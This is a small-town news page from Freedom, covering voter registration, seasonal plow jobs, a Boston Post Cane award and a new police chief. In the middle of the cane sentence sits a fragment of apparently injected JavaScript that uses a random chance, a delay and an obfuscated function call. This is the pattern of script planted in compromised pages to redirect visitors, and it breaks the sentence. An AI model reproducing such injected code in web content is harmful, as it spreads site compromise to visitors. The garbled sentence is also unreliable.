The Supervisors of the Checklist for the Town of Freedom will hold a session for accepting applications for new voter registration, accepting requests for the correction of the checklist, and/or change of political party affiliation on:

To register, you will need to provide proof of your identity, age, citizenship, and domicile(residence). Proof can be either by documents or if you do not have documents with you, by affidavit.

We recommend wearing a mask and continuing the practice of social distancing.

The Town of Freedom Highway Department is seeking to fill part-time seasonal positions consisting of up to 40-hours per week from November 15 – April 1.  Applicants must have a valid driver’s license and reliable transportation as well as experience in snow removal/plowing.

At the Selectmen’s Meeting held on Monday, June 7, 2021, Chairman Les Babb presented Freedom resident Velma Hormell with a proclamation andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and the Boston Post Cane.  At 96 years young, Velma is the 25th Freedom resident, as well as the fourth member of her family to receive the cane.


Officer Jamie Mullen was sworn-in as Freedom’s Police Chief during the Selectmen’s Meeting held on Monday, June 7, 2021.  Mullen was promoted by the Board of Selectmen following Chief Josh Shackford’s announcement of retirement effective June 3, 2021.
